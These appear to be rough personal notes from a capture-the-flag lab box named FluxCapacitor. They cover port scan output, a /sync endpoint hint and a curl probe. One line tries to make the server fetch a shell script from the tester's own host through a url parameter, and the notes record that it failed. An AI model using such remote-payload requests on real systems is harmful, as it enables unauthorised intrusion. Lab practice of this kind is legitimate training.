FluxCapacitor 10.10.10.69

PORT   STATE SERVICE VERSION
80/tcp open  http    SuperWAF



http://10.10.10.69/index.html

note: 
	<!--
		Please, add timestamp with something like:
		<script> $.ajax({ type: "GET", url: '/sync' }); </script>
	-->
	
	Notes: means everytime /sync* or anything similar too it, the web server will send back timestamp making it appear valid.
	2018111T10:21.33 time-respond 
  
  http://10.10.10.69/?url=http://10.10.15.142:8000/shell.py
    Note: Nothing happend. 
    
    
    
    can the webpage for diractory, knowing the timestap is failur
    use "real user agent too not get timestamp respond" 
    e.g | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
    
    
    
    
curl http://fluxcapacitor.htb/sync?url=asdas 10.10.10.69
respond
20180126T20:58:12

<!DOCTYPE html>
<html>
<head>
<title>Keep Alive</title>
</head>
<body>
	OK: node1 alive
	<!--
		Please, add timestamp with something like:
		<script> $.ajax({ type: "GET", url: '/sync' }); </script>
	-->
	<hr/>
	FluxCapacitor Inc. info@fluxcapacitor.htb - http://fluxcapacitor.htb<br>
	<em><met><doc><brown>Roads? Where we're going, we don't need roads.</brown></doc></met></em>
</body>
</html>
